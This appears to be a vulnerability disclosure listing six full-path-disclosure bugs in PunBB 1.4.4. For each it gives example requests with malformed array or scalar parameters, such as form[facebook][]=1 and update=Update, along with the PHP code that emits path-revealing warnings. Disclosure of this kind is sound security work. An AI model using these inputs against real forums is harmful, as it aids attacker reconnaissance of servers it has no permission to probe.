Topic: Full Path Disclosure (multiple locations) — sending a scalar where the code expects an array (or vice versa) triggers a PHP warning that includes the script's absolute path when display_errors is enabled.
PunBB Version: 1.4.4
PHP Version: 5.6
Server: Apache
1)
Example: protocol:localhost/admin/users.php?find_user=1&form=1&form=1&form
Need Admin Account: true
Vuln Code:
else if (isset($_GET['find_user']))
{
$form = isset($_GET['form']) ? $_GET['form'] : array();
// trim() all elements in $form
$form = array_map('forum_trim', $form); // warning (with file path) if $form is not an array, e.g. a scalar query value
$conditions = $query_str = array();
2)
Example: protocol:localhost/admin/ranks.php?action=foo
POST Data:
[other params]&update=Update
Need Admin Account: true
Vuln Code:
// Update a rank
else if (isset($_POST['update']))
{
$id = intval(key($_POST['update'])); // key() emits a warning if $_POST['update'] is not an array
$rank = forum_trim($_POST['rank'][$id]);
$min_posts = intval($_POST['min_posts'][$id]);
3)
Example: protocol:localhost/admin/bans.php?sort_by=1
POST Data:
[other params]&ban_ip[]=127.0.0.1
Need Admin Account: true
Vuln Code:
else if (isset($_POST['add_edit_ban']))
{
$ban_user = forum_trim($_POST['ban_user']);
$ban_ip = forum_trim($_POST['ban_ip']);
$ban_email = strtolower(forum_trim($_POST['ban_email']));
$ban_message = forum_trim($_POST['ban_message']);
$ban_expire = forum_trim($_POST['ban_expire']);
4)
Example: protocol:localhost/admin/censoring.php?action=foo
POST Data:
[other params]&update=Update
Need Admin Account: true
Vuln Code 1:
else if (isset($_POST['update']))
{
$id = intval(key($_POST['update']));
$search_for = forum_trim($_POST['search_for'][$id]);
$replace_with = forum_trim($_POST['replace_with'][$id]);
Vuln Code 2:
// Remove a censor word
else if (isset($_POST['remove']))
{
$id = intval(key($_POST['remove']));
5)
Example: protocol:localhost/admin/settings.php
POST Data:
[other params]&form=1
Need Admin Account: true
Vuln Code:
if (isset($_POST['form_sent']))
{
$form = array_map('trim', $_POST['form']);
6)
Example: protocol:localhost/profile.php?section=identity&id=3
POST DATA:
[other data]&form[facebook][]=1
Other vulnerable params (same pattern, array value instead of scalar):
form[url]
form[twitter]
form[msn]
form[linkedin]
form[icq]
Need Admin Account: false